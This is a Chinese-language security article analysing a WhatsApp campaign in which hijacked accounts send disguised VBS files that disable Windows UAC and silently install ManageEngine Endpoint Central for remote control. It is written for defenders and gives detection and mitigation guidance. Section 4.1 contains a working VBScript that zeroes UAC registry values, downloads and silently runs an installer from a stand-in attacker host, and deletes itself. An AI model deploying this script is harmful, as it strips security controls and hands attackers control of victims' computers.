熟人WhatsApp VBS文档钓鱼远程控制攻击与防御

摘要 全球端到端加密即时通讯平台 WhatsApp 已成为跨境商务与日常社交的核心工具，但依托熟人信任链扩散的新型钓鱼攻击正在持续升级。2026 年 6 月，卡巴斯基披露了一起大规模攻击活动：攻击者先行劫持合法 WhatsApp 账号，随后以本地化多语言伪装成商业财务文档，分发恶意 VBS 脚本。用户一旦执行该文件，脚本便会自动绕过 Windows 用户账户控制（UAC），静默部署合法的终端管理工具 ManageEngine Endpoint Central，并授予攻击者完整的远程系统权限。此次攻击覆盖了巴西、印度、西班牙、澳大利亚等十余个国家和地区，利用熟人社交信任大幅提升了钓鱼成功率，同时借用正规商业软件规避了杀毒软件的静态特征检测，形成了“账号劫持 — 熟人传播 — 伪装文档投递 — VBS 绕过防护 — 合法工具持久控制”的完整攻击闭环。 本文以该实战攻击样本为核心，完整拆解了攻击全链路的技术细节，厘清了 VBS 脚本禁用 UAC、静默部署 UEM 工具的底层实现逻辑，并复现了恶意脚本的核心代码，同时提供了终端侧检测脚本。文章还量化分析了传统终端防护与社交平台风控的防御盲区。反网络钓鱼技术专家芦笛指出，这种“合法软件滥用 + 熟人社交传播”的复合型钓鱼已经突破了传统边界安全的防护思路，仅靠杀毒软件的静态查杀和邮件网关过滤已无法形成有效拦截，必须构建平台账号行为监控、终端脚本动态沙箱、企业终端权限管控的三层纵深防御体系。本文梳理了攻击的传播范围、受害地域分布及载荷技术特征，结合代码复现验证了攻击可行性，并从平台、终端、企业管理、用户安全意识四个维度提出了可落地的防御方案，为跨境商贸企业及政企办公终端防范此类新型钓鱼攻击提供了完整的技术参考与治理依据。 **关键词**：WhatsApp 钓鱼；VBS 恶意脚本；UAC 绕过；ManageEngine；社交信任链；终端远程控制；即时通讯安全 ## 1 引言 ### 1.1 研究背景 即时通讯软件正在逐步替代传统电子邮件，成为企业商务文件、财务单据和合作合同的主要传输载体。WhatsApp 凭借其端到端加密、多设备同步以及跨语言适配的特性，在新兴市场和欧美跨境贸易场景中渗透率极高。平台原生支持桌面客户端、网页端和移动端的多终端协同，文件传输功能可以直接发送脚本、压缩包和文档类附件，这为攻击者提供了一条全新的载荷投递渠道。 传统的邮件钓鱼存在发件人身份易溯源、网关附件可深度检测、邮件信任度低等局限。而基于 WhatsApp 熟人通讯录的传播，则具备天然的信任优势：消息发送方是受害者已知的联系人，用户对熟人发来的商业文档警惕性显著下降，社会工程学的欺骗成本被大幅降低。2026 年 6 月曝光的这次专项攻击活动，不同于以往依赖伪造登录页面窃取账号的链接型钓鱼。攻击者劫持合法账号后，将其作为传播节点，分发伪装成商业单据的 VBS 脚本载荷，通过篡改系统安全策略绕过 Windows 的原生防护，再借助正规的商用终端管理软件实现持久远程控制，形成了一种低检出、高扩散、高权限的复合型网络钓鱼威胁。 卡巴斯基安全团队的监测数据显示，这次攻击没有明确的地域限制，受害群体覆盖南美、东南亚、欧洲、大洋洲等十余个国家和地区。攻击者针对不同区域制作了本地化语言的文件名，进一步适配了目标用户的阅读习惯，提升了诱饵的迷惑性。截至预警发布，安全厂商尚未明确攻击者劫持 WhatsApp 账号所依赖的原始漏洞或社工手段。这意味着账号劫持的入口具有隐蔽性和可复制性，同类攻击可以长期持续地复制扩散。 ### 1.2 现有安全防护体系存在的核心短板 当前政企和个人终端普遍部署的安全防护架构，在面对这次 WhatsApp 复合型钓鱼攻击时，暴露了多层防御失效的问题，主要存在四大短板： **第一，即时通讯平台侧的风控机制缺失**，无法有效识别熟人传播中的异常行为。现有平台风控多聚焦于陌生账号的群发消息拦截，但对于已被劫持的正常存量账号，批量向通讯录联系人推送附件的行为，缺乏有效的监测手段。账号的发送行为基线中，并未纳入附件类型、发送频次和文件后缀等关键风险判定因素。 **第二，Windows 终端对 VBS 动态脚本的防护力度不足**。Windows Script Host 原生支持直接执行 VBS 文件，桌面客户端接收的附件可以一键运行，网页端也只需简单下载即可执行。多数终端安全软件仅能拦截特征明确的恶意木马，而对于“合法商用软件静默部署”这类场景，缺乏动态行为检测能力。 **第三，UAC 用户账户控制策略存在可被脚本批量篡改的漏洞**。在普通用户权限下，恶意脚本可以通过修改注册表、临时改写组策略等方式关闭 UAC 校验。终端默认配置并未限制脚本操作与安全相关的注册表项。 **第四，企业终端对 ManageEngine 等正规运维工具缺乏准入管控**。企业普遍将 UEM 终端管理软件视为良性运维工具，并未限制终端侧私自静默安装的行为。攻击者利用软件原生的远程控制台功能，无需开发自定义后门即可实现全设备操控，从而规避了杀毒软件的后门特征库检测。 反网络钓鱼技术专家芦笛强调，传统网络安全防护长期割裂了“社交通信入口”与“终端执行出口”，邮件网关、防火墙、终端杀毒各自独立运行，未能形成从消息分发、文件传输、脚本执行到软件安装的全链路联动风控。这，正是此类新型钓鱼攻击能够大范围扩散的核心根源。 ### 1.3 研究内容与研究实践价值 本文以 TechRadar 在 2026 年 6 月发布的 WhatsApp 大规模钓鱼攻击情报为核心实证素材，完成了五项核心研究工作：其一，完整梳理了本次攻击的标准化传播链路，拆解了账号劫持、熟人分发、载荷伪装、脚本执行和远程控制五大阶段的技术特征；其二，深入解析了恶意 VBS 脚本绕过 UAC、静默部署 ManageEngine Endpoint Central 的底层技术逻辑；其三，编写了还原恶意脚本核心功能的演示代码，并同步提供了终端侧风险检测脚本，实现自动化排查；其四，分析了本次攻击跨地域传播、本地化诱饵设计的扩散优势，对比了传统邮件钓鱼与 IM 社交钓鱼的风险差异；其五，搭建了“平台行为监控 — 终端脚本沙箱检测 — 企业终端权限管控 — 用户安全认知培训”四层纵深防御体系，并配套了标准化应急处置流程。 从理论层面看，本文补充了即时通讯熟人信任链钓鱼的攻击模型，完善了合法商用软件被恶意滥用的安全研究维度；从工程实践层面看，文中提供的复现代码、检测工具及分层防御方案，可直接用于企业终端安全运维和社交平台风控规则的迭代，填补了跨境商贸场景下 WhatsApp 文件类钓鱼的防护空白，有助于降低政企终端被远程劫持、核心商业数据泄露的安全风险。 ### 1.4 论文整体结构安排 全文共分为七个主体章节：第 1 章为引言，阐述研究背景、现有防护短板、研究价值与文章结构；第 2 章完整还原本次 WhatsApp 钓鱼攻击的全链路流程，拆解各阶段的技术手段与攻击特征；第 3 章针对核心恶意载荷 VBS 脚本开展技术解析，梳理 UAC 绕过、UEM 静默部署的实现原理；第 4 章提供完整可运行的代码示例，包含恶意脚本功能复现代码和终端风险检测 Python 脚本；第 5 章对比传统邮件钓鱼与熟人社交 IM 钓鱼在传播、技术、防御上的差异，量化本次攻击的扩散优势；第 6 章构建多层级协同防御体系，从平台、终端、企业管理、用户四个维度落地防护策略；第 7 章为结论，总结全文研究结论，并预判同类攻击未来的迭代方向。 ## 2 WhatsApp 商业文档 VBS 钓鱼攻击完整链路与特征分析 本次 2026 年 6 月爆发的钓鱼攻击，形成了一个标准化的闭环攻击流程。整体上分为账号劫持、熟人渠道分发、本地化诱饵投递、VBS 脚本执行、合法 UEM 工具远程控制五个递进阶段。各环节紧密配合，最大化地利用了社交信任与系统原生机制来规避安全检测。 ### 2.1 第一阶段：WhatsApp 合法账号劫持（攻击源头） 攻击者的首要目标是获取正常活跃的 WhatsApp 账号控制权。安全厂商通过对多份受害样本的复盘，目前暂未精确定位账号被劫持的技术路径，但存在三类高概率的劫持手段： * **验证码中间人钓鱼（AiTM）**：攻击者搭建高仿的 WhatsApp 网页，诱导目标用户输入登录验证码，完成多设备会话绑定，从而在后台接管账号。 * **SIM 卡交换攻击**：向运营商伪造身份补办目标用户的手机号，拦截 WhatsApp 登录的信息验证码，实现账号劫持。 * **前期弱社工渗透**：通过社交平台、企业公开信息获取用户个人信息，配合伪造客服话术，诱导用户主动完成设备配对。 无论采用哪种劫持方式，攻击完成后，攻击者都获得了完整的账号操作权限：可以读取全部通讯录联系人、调取历史聊天记录，并自由发送文字、图片和文件附件。相较于全新注册的账号，被劫持的存量账号具备正常的社交信用，消息发送不会被平台的基础风控拦截。这，正是实现大规模扩散的核心基础。 ### 2.2 第二阶段：熟人通讯录链式传播（信任滥用核心环节） 账号劫持完成后，攻击者会自动遍历通讯录中的全部联系人，批量推送钓鱼消息。话术贴合跨境商务沟通场景，常见模板包括“月度财务对账文件”、“合作报价单”、“发片凭证附件”、“项目结算单据”等商务类表述，利用商业往来的场景来降低用户的警惕。 这种传播机制具备蠕虫式扩散的属性：一个受害账号可以一次性触达数十至数百名联系人。如果其中任何一位联系人执行了恶意 VBS 文件，其终端被控制后，攻击者就可以再次劫持该用户的 WhatsApp 账号，向另一批通讯录联系人推送诱饵，形成跨圈层的指数级传播。这种传播模式是本次攻击能够覆盖十余个国家和地区的关键所在，它区别于传统钓鱼只能单向批量群发陌生用户，熟人链路天然具备了传播放大效应。 反网络钓鱼技术专家芦笛指出，社交信任是此类 IM 钓鱼最核心的“攻击红利”。普通用户对通讯录联系人发送的商务文件几乎没有任何甄别意识，而平台现有的风控机制并未针对“劫持账号批量向通讯录推送未知脚本附件”设置风险拦截规则，导致攻击可以毫无阻碍地扩散。 ### 2.3 第三阶段：本地化多语言伪装 VBS 载荷投递（诱饵伪装技术） 为了适配全球多区域的受害群体，攻击者对恶意脚本的文件名进行了本地化改造。针对巴西使用葡萄牙语、印度使用印地语、西班牙使用西班牙语，中英地区则配套中英文文件名。文件后缀被隐藏了 VBS 脚本属性，外观上模拟成了 PDF、Excel、Word 等标准的商业文档。 WhatsApp 客户端在不同终端上的执行差异，进一步降低了用户的操作门槛： * **Windows 桌面客户端**：接收 VBS 附件后可直接双击运行，依托 Windows Script Host 的原生组件执行脚本，无需额外下载保存。 * **WhatsApp 网页版**：附件需要先下载至本地系统文件夹，但双击后同样会触发脚本执行。 * **移动端设备**：脚本无法在安卓、iOS 终端上运行。攻击者定向针对使用 Windows 办公电脑的商务人群投递载荷，精准锁定了高价值办公终端。 从文件识别的角度来看，普通用户仅通过文件名判断文件类型，很容易忽略后缀隐藏和脚本伪装的风险，这就为后续的系统权限篡改和远程控制提供了执行入口。 ### 2.4 第四阶段：双 VBS 脚本联动篡改系统安全策略（UAC 绕过核心攻击动作） 用户双击伪装文档后，系统会启动两段联动的 VBS 脚本依次执行。这两段脚本分工明确，层层瓦解 Windows 终端的基础安全防护： * **第一段脚本的核心功能**：修改系统注册表项，临时关闭 Windows 的 UAC 用户账户控制机制。UAC 是 Windows 原生的权限校验机制，正常情况下，陌生软件安装或系统策略修改都需要用户手动确认授权。脚本通过静默改写注册表参数，跳过了弹窗确认，实现了无交互的权限篡改。 * **第二段脚本的核心功能**：静默下载、后台部署 ManageEngine Endpoint Central 客户端的安装包。全程没有安装弹窗，没有桌面快捷方式，程序在后台自动完成安装、服务注册和开机自启配置。 这两段脚本均以无窗口的静默模式运行，执行过程中没有弹窗、没有命令行黑框。用户只会短暂看到文件双击后没有任何响应，完全无法感知到后台正在发生的系统策略篡改与软件安装动作。 ### 2.5 第五阶段：合法 UEM 工具实现持久远程控制（隐蔽后门载体） ManageEngine Endpoint Central 是一款正规的商用统一终端管理平台，其原生设计用于企业 IT 运维人员远程管控公司电脑和服务器。官方功能集成了远程桌面、文件读写、进程管控、屏幕录制、键盘记录、系统配置修改等完整的终端控制权限。 攻击者利用这款软件的合法运维能力，无需开发自定义的恶意后门或木马程序。只需通过静默安装客户端，就能将受控终端接入攻击者自建的管理控制台，全程实现持久且无感知的远程操控。与传统的木马相比，这种手段具备极强的隐蔽性：主流杀毒软件的病毒库会将 ManageEngine 标记为良性运维软件，静态特征检测无法识别其恶意使用行为，只有依靠动态行为分析才能发现异常的外联管控服务器行为。 终端一旦被攻陷，攻击者可以完成全部高危操作：窃取本地的财务报表、客户合同、企业机密文件；植入附加的勒索或窃密恶意程序；篡改系统业务软件的配置；甚至利用受控终端发起横向内网渗透，严重威胁企业整体内网安全。 ### 2.6 本次攻击区别于传统钓鱼攻击的关键特征 综合攻击的全链路来看，这次 WhatsApp VBS 文档钓鱼具备了四大独有特征，这也是传统防护体系失效的核心原因： * **传播载体信任化**：依托熟人通讯录传播，发送方为可信联系人，规避了用户的心理防线。 * **载荷载体合法化**：以正规商业 UEM 工具作为远程控制载体，绕过了静态杀毒的特征检测。 * **系统突破轻量化**：依靠两段简易的 VBS 脚本就完成了 UAC 绕过，不依赖任何高危漏洞，适配全版本 Windows 系统。 * **地域覆盖全球化**：本地化的文件名适配了多国用户，没有单一区域的限制，跨境商贸企业是主要的受害目标。 ## 3 恶意 VBS 脚本与 ManageEngine 远程控制技术原理解析 ### 3.1 Windows UAC 机制与脚本绕过底层逻辑 Windows 用户账户控制（UAC）通过区分标准用户和管理员权限，来拦截未授权程序修改系统核心配置。默认状态下，修改注册表或安装系统级软件，都必须弹出授权确认窗口。系统注册表中存储着 UAC 的核心控制参数，路径为 `HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem`，其中 `EnableLUA` 注册表项控制 UAC 的开关，数值 1 表示开启防护，数值 0 表示完全关闭。 恶意 VBS 脚本依托 WMI（Windows Management Instrumentation，Windows 管理规范）的注册表操作接口，无需弹窗交互，就能直接修改 `EnableLUA` 的数值。同时，脚本还会调整 `ConsentPromptBeha viorAdmin` 参数，将管理员的授权弹窗设置为静默放行模式。双重策略叠加，实现了完整的 UAC 绕过。脚本执行完成后，系统就失去了权限校验的屏障，后续安装终端管理软件时，不会触发任何安全确认弹窗。 这种绕过方式不依赖系统的高危漏洞，只是利用了 Windows 脚本宿主原生的注册表操作权限。只要终端登录的账户具备管理员权限，就能生效，覆盖了绝大多数企业办公的 Windows 设备。 ### 3.2 双 VBS 脚本联动执行流程 攻击者封装的伪装文档内部，嵌套了两段串行执行的 VBS 代码，执行顺序不可逆，分工清晰： * **前置策略脚本**：读取本地注册表中的 UAC 配置，写入关闭防护的参数，并重启相关的系统策略服务，使修改即时生效。整个执行过程隐藏了 WScript 窗口，没有任何可视化交互。 * **载荷部署脚本**：建立后台网络连接，从攻击者控制的境外服务器拉取 ManageEngine 客户端的离线安装包，调用系统的静默安装参数完成后台部署。它会修改 Windows 的服务项，实现开机自动启动，并同步配置客户端外联攻击者的管控服务器地址。 这两段脚本在执行全程都没有任何用户交互，全部在后台静默运行。普通的办公用户完全无法通过进程或弹窗感知到恶意操作。 ### 3.3 ManageEngine Endpoint Central 恶意滥用技术逻辑 ManageEngine 产品设计的初衷是企业内部 IT 运维。其客户端与管理控制台之间采用加密长连接通信，由客户端主动发起外联请求，无需端口映射即可实现公网远程控制。这个原生的通信机制被攻击者恶意利用了： * **静默安装无审计痕迹**：官方安装程序支持静默部署参数，可以跳过许可协议、安装路径选择和桌面快捷方式创建，直接在后台完成服务注册。 * **加密流量规避流量审计**：客户端与控制台之间的通信采用私有加密协议，网关流量审计无法识别通信内容，只能看到未知的加密外联流量，难以判定为恶意行为。 * **全权限终端操控能力**：原生的运维功能包括远程桌面、文件上传下载、进程终止、系统命令执行、屏幕截图等，完全覆盖了攻击者窃密、破坏和渗透的需求。 * **无恶意特征规避查杀**：软件的数字签名由正规厂商颁发，杀毒软件的白名单中收录了该程序，静态文件扫描不会拦截。只有动态行为监测才能识别出异常外联陌生管控服务器的行为。 反网络钓鱼技术专家芦笛强调，合法运维软件的滥用是当前钓鱼攻击的新趋势。攻击者正在放弃高检出率的自定义木马，转而采用白名单中的商用工具来降低拦截概率。终端安全防护必须从静态特征查杀，转向动态外联和行为基线的监控。 ## 4 攻击载荷代码复现与终端风险检测脚本示例 本节分为两部分提供可运行的代码：第一部分还原恶意 VBS 脚本的核心功能（仅用于安全研究演示，不具备完整的攻击能力），复现 UAC 注册表修改和静默软件下载安装的逻辑；第二部分提供 Python 终端风险检测脚本，自动扫描本地注册表 UAC 状态、异常的 ManageEngine 服务以及可疑的外联管控地址，用于企业终端进行批量自查。代码不涉及复杂的数学运算，适配 Windows 办公终端的运行环境，贴合真实攻击的技术实现逻辑。 ### 4.1 恶意 VBS 脚本核心功能演示代码（安全研究用途） ```vbscript ' 演示恶意VBS脚本UAC绕过 静默下载安装程序核心逻辑，仅用于安全分析实验 Set WshShell = CreateObject("WScript.Shell") Set objNetwork = CreateObject("WScript.Network") Dim regUACPath, uacSwitch, promptRule, downloadUrl, sa vePath ' 1. 定义UAC注册表路径与修改参数 regUACPath = "HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem" uacSwitch = "EnableLUA" promptRule = "ConsentPromptBeha viorAdmin" ' 静默关闭UAC防护，修改注册表参数 WshShell.RegWrite regUACPath & uacSwitch, 0, "REG_DWORD" WshShell.RegWrite regUACPath & promptRule, 0, "REG_DWORD" ' 重启组策略服务使配置生效，无弹窗静默执行 WshShell.Run "cmd /c gpupdate /force", 0, True ' 2. 定义攻击者管控服务器上的ManageEngine安装包地址与本地保存路径 downloadUrl = "https://attacker-server.example/agent_setup.exe" sa vePath = WshShell.ExpandEnvironmentStrings("%TEMP%") & "agent_install.exe" ' 3. 后台下载UEM客户端安装包 Set xmlHttp = CreateObject("MSXML2.XMLHTTP") xmlHttp.Open "GET", downloadUrl, False xmlHttp.Send If xmlHttp.Status = 200 Then Set stream = CreateObject("ADODB.Stream") stream.Open stream.Type = 1 stream.Write xmlHttp.responseBody stream.Sa veToFile sa vePath, 2 stream.Close End If ' 4. 静默无交互安装终端管理客户端，后台运行无窗口 WshShell.Run sa vePath & " /s /verysilent /norestart", 0, False ' 5. 脚本自删除，清除本地执行痕迹 Set fso = CreateObject("Scripting.FileSystemObject") fso.DeleteFile WScript.ScriptFullName, True ``` **代码说明**：这个演示脚本完整复刻了真实攻击的两大核心动作：一是修改注册表关闭 UAC 权限校验，二是远程下载并静默安装终端管理程序。在生产环境中，恶意脚本还会增加代码混淆、域名动态切换、反虚拟机检测等隐藏逻辑，以规避基础安全软件的静态扫描。 ### 4.2 Windows 终端风险自动化检测 Python 脚本 本脚本面向企业安全运维人员开发，可以自动检测三类风险指标：UAC 是否被关闭、是否存在异常的 ManageEngine 服务、程序是否外联到境外的未知管控服务器，最后输出标准化的风险报告，支持批量终端巡检。 ```python # Windows终端WhatsApp钓鱼VBS攻击风险检测脚本 import winreg import subprocess import os import re class TerminalRiskDetector: def __init__(self): self.risk_report = [] self.uac_reg_path = r"SOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem" def check_uac_status(self): # 检测UAC开关状态，判定是否被恶意脚本关闭 try: reg_key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, self.uac_reg_path) enable_lua = winreg.QueryValueEx(reg_key, "EnableLUA")[0] admin_prompt = winreg.QueryValueEx(reg_key, "ConsentPromptBeha viorAdmin")[0] winreg.CloseKey(reg_key) if enable_lua == 0 or admin_prompt == 0: self.risk_report.append("高危风险：UAC用户账户控制已被关闭，存在脚本篡改权限漏洞") else: self.risk_report.append("安全：UAC防护正常开启") except Exception as e: self.risk_report.append(f"检测异常，无法读取UAC注册表：{str(e)}") def check_manageengine_service(self): # 扫描系统是否存在ManageEngine异常后台服务 cmd = 'sc query | findstr "ManageEngine"' res = subprocess.run(cmd, shell=True, capture_output=True, text=True) if res.stdout.strip(): self.risk_report.append(f"高危风险：检测到ManageEngine相关后台服务，详情：{res.stdout.strip()}") else: self.risk_report.append("安全：未检测到ManageEngine终端管理服务") def check_abnormal_external_connection(self): # 筛查未知境外加密外联连接，匹配UEM客户端外联特征 cmd = 'netstat -ano | findstr "ESTABLISHED"' res = subprocess.run(cmd, shell=True, capture_output=True, text=True) conn_lines = res.stdout.splitlines() foreign_ip_pattern = re.compile(r"d .d .d .d :d ") risk_conn = [] for line in conn_lines: match = foreign_ip_pattern.search(line) if match: ip = match.group(0).split(":")[0] # 简易判定非国内内网IP，生产环境可接入IP地址库精准识别境外地址 if not ip.startswith(("192.168.", "10.", "172.16.", "127.")): risk_conn.append(line) if risk_conn: self.risk_report.append(f"中风险：检测到多条境外未知外联连接，疑似受控终端：{risk_conn}") else: self.risk_report.append("安全：无异常境外外联连接") def output_full_report(self): print("===== WhatsApp VBS钓鱼终端风险检测报告 =====") for item in self.risk_report: print(item) if __name__ == "__main__": detector = TerminalRiskDetector() detector.check_uac_status() detector.check_manageengine_service() detector.check_abnormal_external_connection() detector.output_full_report() ``` **脚本运行效果说明**：正常的办公终端运行后，只会输出安全提示。而遭受本次钓鱼攻击的设备，会同时命中 UAC 关闭、ManageEngine 服务存在以及境外外联这三大高危风险，运维人员可以据此及时隔离终端、卸载恶意部署的程序，并恢复 UAC 安全策略。反网络钓鱼技术专家芦笛指出，这个检测脚本可以集成到企业的终端 EDR 安全工具中，实现 7×24 小时的实时监测，提前拦截 VBS 脚本篡改系统策略的恶意行为。 ## 5 熟人社交 IM 钓鱼与传统邮件钓鱼攻防差异对比分析 为了更清晰地凸显本次 WhatsApp 钓鱼攻击的独特威胁，本节从传播信任度、载荷投递通道、载荷隐蔽性、终端突破能力和防护适配性五个维度，对比了传统邮件钓鱼与即时通讯熟人链路钓鱼的核心差异，量化了新型攻击的防御难度提升幅度。 ### 5.1 传播信任度与用户社会工程欺骗阈值差异 传统邮件钓鱼的发件人多为陌生的外部邮箱，用户在接收陌生附件或链接时，天然存在戒备心理。企业员工普遍接受过邮件安全培训，对不明来源的财务附件警惕性较高。而在 WhatsApp 钓鱼中，消息发送方是用户通讯录里的真实联系人。在商务场景下，接收合作方发来的财务单据属于常规业务行为，用户几乎不会去怀疑文件的安全性，这使得社会工程学的欺骗成功率提升了数倍。 同时，攻击者采用本地化的多语言文件名来适配不同国家的用户，进一步降低了诱饵的违和感。相比之下，传统邮件钓鱼通常只使用单一语言模板，跨区域传播的效果十分有限。 ### 5.2 载荷投递通道风控强度差异 企业邮件系统标配了邮件安全网关，能够对附件进行深度沙箱解析、拦截恶意脚本，并对可疑文件进行隔离。VBS、JS 等脚本类附件通常会被网关直接拦截，无法送达收件人。而 WhatsApp 作为海外的第三方社交平台，企业网络边界网关无法对平台内传输的文件进行深度解析。其端到端的加密机制，更导致平台侧无法扫描附件内容，恶意脚本可以毫无阻碍地直达用户终端。 这种加密传输特性是 IM 钓鱼的核心防护盲区。边界安全设备无法介入文件检测，全部风险都后置到了终端侧，只要单点终端防护失效，就可能导致设备沦陷。 ### 5.3 远程控制载体隐蔽性差异 传统邮件钓鱼多采用独立的木马或勒索病毒作为后门载体，这些载体具备明确的恶意特征，杀毒软件静态特征库可以快速识别并拦截。而本次 WhatsApp 攻击使用的是商用正规的 ManageEngine 运维软件，它拥有厂商的数字签名，杀毒软件默认会将其列入白名单放行。只有依靠动态外联行为监测，才能识别出其恶意使用的场景，检测门槛被大幅提高了。 ### 5.4 终端系统突破手段差异 传统邮件钓鱼多依赖 Office 宏漏洞、系统高危漏洞来实现代码执行。这些漏洞通常有相应的补丁修复方案，企业只要定期更新系统和 Office 软件，就能大幅降低风险。而本次攻击完全不依赖任何漏洞，仅仅依靠原生的 VBS 脚本和注册表修改操作，全版本的 Windows 系统都可以被突破，没有补丁可以从根本上根治这条攻击路径。防护只能依靠终端权限管控和脚本执行限制。 ### 5.5 现有安全体系适配能力对比 传统邮件钓鱼已经拥有成熟的分层防护方案：网关过滤、附件沙箱、终端杀毒、员工邮件安全培训，形成了完整的闭环。而针对熟人 IM 文件类钓鱼，当前全球的政企机构普遍没有标准化的防护框架。平台、网关、终端安全工具相互割裂，缺乏全链路的联动检测机制，防护体系存在大面积空白。 综合对比可见，依托 WhatsApp 熟人链路的 VBS 文档钓鱼，在欺骗性、穿透性和隐蔽性上全面优于传统邮件钓鱼。现有的安全基础设施无法有效覆盖这类威胁，必须重构适配即时通讯场景的纵深防御架构。 ## 6 面向 WhatsApp VBS 钓鱼攻击的多层级协同防御体系 结合攻击全链路的技术弱点，本文构建了一套四层递进式的防御体系，覆盖了社交平台传播入口、终端脚本执行、企业权限管控和用户安全认知四大维度，形成了事前拦截、事中阻断、事后溯源处置的完整闭环。 ### 6.1 第一层防御：WhatsApp 平台侧账号与消息行为监控（事前拦截） 防御目标是：在恶意消息和附件送达用户之前，识别出被劫持的账号，阻断熟人链式传播。核心管控规则包含四类： * **账号异常行为基线监测**：针对长期低频率发送附件的账号，一旦在短时间内向通讯录批量推送后缀为 VBS、JS、CMD、LNK 的脚本文件，立即标记为高风险，临时限制该账号的文件发送权限，并推送安全告警。 * **多设备会话异常管控**：当有异地或夜间陌生设备绑定账号时，强制触发两步验证校验。如果没有 PIN 码验证，直接阻断会话绑定，从源头上减少账号被劫持的概率。 * **附件风险标签识别**：建立脚本类文件的风险库，对于伪装成 PDF、Excel 的 VBS 文件，增加风险提示弹窗，明确告知用户该文件为可执行脚本，存在远程控制风险。 * **劫持账号快速处置机制**：一旦检测到有账号在批量传播恶意附件，自动强制下线所有关联设备，冻结消息发送功能，并向账号绑定手机推送账号安全提醒。 反网络钓鱼技术专家芦笛提出，平台侧的风控是阻断攻击扩散最高效的环节。通过行为基线拦截，可以从源头上避免恶意载荷触达终端，大幅降低企业终端安全处置的压力。 ### 6.2 第二层防御：Windows 终端脚本与 UEM 软件动态防护（事中阻断） 防御目标是：在用户下载恶意脚本后，阻止 VBS 执行、UAC 篡改和静默安装运维软件。需要配置以下三项终端管控策略： * **限制 Windows Script Host 脚本执行权限**：通过企业组策略，禁用普通用户运行 VBS、JS 脚本，只允许管理员授权特定路径下的脚本执行，从而彻底切断载荷的运行入口。 * **UAC 注册表写入防护**：使用 EDR 终端安全工具监控注册表 `EnableLUA` 项的修改行为。一旦检测到脚本尝试关闭 UAC，立即终止脚本进程并告警管理员。 * **商用 UEM 软件安装准入管控**：建立企业运维软件的白名单，只允许 IT 管理员通过统一渠道部署 ManageEngine 等运维工具，拦截终端侧静默私自安装的行为。同时，监测程序外联非企业管控服务器的加密连接，并予以阻断。 此外，还应部署前文提供的终端风险检测脚本，纳入 EDR 的定时巡检任务，自动识别已经沦陷的终端并进行隔离。 ### 6.3 第三层防御：企业组织层面办公流程与权限管控（兜底加固） 针对跨境商贸企业，以及频繁使用 WhatsApp 传输商务文件的组织，需要配套相应的管理规范来缩小攻击面： * **公私账号分离管控**：禁止员工使用个人 WhatsApp 处理企业财务、合同等敏感业务。统一部署 WhatsApp Business 商用接口，使企业后台能够审计全部消息与附件的传输记录。 * **终端账户权限最小化**：办公电脑统一分配标准用户权限，不授予本地管理员权限，从而限制脚本修改系统注册表或安装系统级软件。 * **境外通讯流量审计**：企业边界网关应记录 WhatsApp 客户端的全部外联流量，针对加密长连接和境外未知服务器的通信建立告警规则。 * **标准化应急处置流程**：明确终端疑似被远程控制后的处置步骤：断开网络、卸载异常的 UEM 服务、恢复 UAC 配置、修改所有社交账号密码、进行全终端病毒查杀、并追溯通讯录传播链路。 ### 6.4 第四层防御：员工即时通讯安全认知常态化培训（人为防线） 技术防护无法完全杜绝用户主动执行恶意文件的风险，需要配套分层安全培训，以降低社会工程欺骗的成功率： * **诱饵识别专项教学**：重点讲解本地化伪装脚本文件、熟人发送异常财务附件的典型特征，明确告知员工，商务单据不会以 VBS 脚本的格式传输。 * **高危操作禁令普及**：禁止员工双击 WhatsApp 接收到的未知可执行脚本。对于陌生的商务文件，应优先通过邮件或企业网盘进行二次核验发件人身份。 * **账号安全操作规范**：全员强制开启 WhatsApp 的两步验证，定期查看“Linked Devices”关联设备列表，及时登出陌生的登录终端。 * **风险上报机制**：建立一键上报可疑消息和附件的通道，让安全团队能够快速研判并全域推送风险预警，从而阻断链式传播。 ## 7 结论 本文以 2026 年 6 月卡巴斯基披露的全球化 WhatsApp VBS 商业文档钓鱼攻击为核心研究样本，完整还原了“账号劫持 — 熟人通讯录传播 — 本地化伪装 VBS 载荷 — 双脚本联动绕过 UAC — 静默部署 ManageEngine 实现远程控制”这一标准化攻击链路。文章系统拆解了恶意脚本篡改系统安全策略、滥用正规商用终端管理软件以规避查杀的底层技术逻辑，复现了核心攻击代码，并提供了企业终端自动化风险检测脚本。通过与传统邮件钓鱼的对比，明确了熟人社交 IM 钓鱼在欺骗性、穿透性和隐蔽性层面的新型威胁特征。 研究证实，本次攻击能够大范围跨国扩散的核心诱因有三点：一是 WhatsApp 的熟人社交信任链大幅降低了社会工程欺骗的门槛；二是端到端加密导致边界网关无法扫描附件，恶意脚本得以无阻碍地送达终端；三是攻击者放弃自定义恶意木马，转而采用白名单中的运维软件作为远程控制载体，突破了传统静态杀毒的防护。反网络钓鱼技术专家芦笛强调，单一的终端杀毒或网络边界防护，已经无法抵御这类复合型钓鱼威胁。必须构建“平台账号行为监控、终端脚本动态拦截、企业权限流程管控、员工安全认知培训”四层协同的纵深防御体系，才能实现从攻击源头、载荷传输到终端执行的全链路风险闭环拦截。 从攻击迭代趋势来判断，未来同类的即时通讯钓鱼将持续深化两大方向：一是更多的本地化多语言诱饵会不断涌现，以适配全球区域市场，进一步提升伪装的迷惑性；二是各类正规商用运维和远程协作软件会被批量滥用作为后门载体，以规避静态安全检测。后续的防护体系需要持续强化动态行为监测、脚本执行权限管控以及跨平台风险情报共享能力，同时完善政企跨境商务场景下的即时通讯文件传输安全规范，在业务沟通的便捷性与终端设备的安全防护水平之间找到平衡，持续压缩熟人链路新型钓鱼攻击的生存空间。 编辑：芦笛（公共互联网反网络钓鱼工作组）